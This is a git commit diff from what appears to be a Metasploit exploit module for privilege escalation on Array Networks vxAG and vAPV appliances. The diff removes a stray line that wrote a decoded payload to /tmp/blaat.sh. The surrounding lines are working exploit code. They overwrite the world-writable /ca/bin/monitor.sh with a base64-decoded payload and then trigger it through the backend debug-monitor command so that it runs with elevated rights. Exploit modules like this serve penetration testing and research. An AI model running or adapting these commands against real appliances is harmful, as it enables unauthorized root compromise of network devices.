Array Networks vxAG and vAPV SSH key and privesc

bug/bundler_fix
xistence 2014-03-17 14:11:16 +07:00
parent 1043d9d8b2
commit e261975c34
1 changed files with 0 additions and 2 deletions

View File

@ -177,8 +177,6 @@ class Metasploit3 < Msf::Exploit::Remote
command += "cat /ca/bin/monitor.sh > /tmp/#{montemp};" command += "cat /ca/bin/monitor.sh > /tmp/#{montemp};"
# Insert our base64 encoded payload in to the world writable /ca/bin/monitor.sh file # Insert our base64 encoded payload in to the world writable /ca/bin/monitor.sh file
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /ca/bin/monitor.sh;" command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /ca/bin/monitor.sh;"
command += "/usr/bin/perl -MMIME::Base64 -le 'print decode_base64(\"#{cmd}\")' > /tmp/blaat.sh;"
# Turn debug monitoring on, which will start the monitor.sh and thus our payload # Turn debug monitoring on, which will start the monitor.sh and thus our payload
command += '/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`;' command += '/ca/bin/backend -c "debug monitor on"`echo -e "\0374"`;'
# Copy monitor.sh data back # Copy monitor.sh data back